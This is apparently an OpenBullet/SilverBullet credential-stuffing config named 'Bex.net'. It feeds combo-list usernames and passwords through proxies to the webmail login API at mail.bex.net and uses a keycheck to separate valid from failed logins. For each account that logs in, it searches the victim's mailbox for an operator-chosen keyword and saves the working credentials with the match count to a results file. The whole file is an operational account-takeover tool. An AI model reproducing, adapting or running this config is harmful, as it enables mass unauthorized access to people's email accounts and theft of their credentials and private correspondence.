[SETTINGS]
{
  "Name": "Bex.net",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2023-05-10T21:43:54.7208571+07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@ntphong04",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": true,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "keywords",
      "VariableName": "kw",
      "Id": 795015828
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Bex",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
PARSE "<USER>" LR "" "@" -> VAR "name" 

PARSE "<USER>" LR "@" "" -> VAR "domain" 

REQUEST POST "https://mail.bex.net/app/pageapi.asp" 
  CONTENT "api=signin&username=<name>&password=<PASS>&domaincode=bbemail&RememberMe=&domain=<domain>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: vi,en;q=0.9,en-GB;q=0.8,en-US;q=0.7" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: mail.bex.net" 
  HEADER "Origin: https://mail.bex.net" 
  HEADER "Referer: https://mail.bex.net/app/" 
  HEADER "sec-ch-ua: \"Microsoft Edge\";v=\"113\", \"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect email or password." 
    KEY "Unknown user login error." 
  KEYCHAIN Success OR 
    KEY "FirstName" 
    KEY "bpubliccontacts" 
    KEY "quota" 

REQUEST GET "https://mail.bex.net/app/mail_search.asp?searchtxt=<kw>&options=false&field=full&date=&dateop=&size=&restrict_size=&message_type=ALL&folder=all&mode=mobile" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: vi,en;q=0.9,en-GB;q=0.8,en-US;q=0.7" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: mail.bex.net" 
  HEADER "Referer: https://mail.bex.net/app/" 
  HEADER "sec-ch-ua: \"Microsoft Edge\";v=\"113\", \"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1" 
  HEADER "X-Requested-With: XMLHttpRequest" 

PARSE "<SOURCE>" JSON "mwcount" CreateEmpty=FALSE -> CAP "total" 

UTILITY File "Result//Bex.net//<kw>.txt" AppendLines "<USER>:<PASS> | total: <total>" 

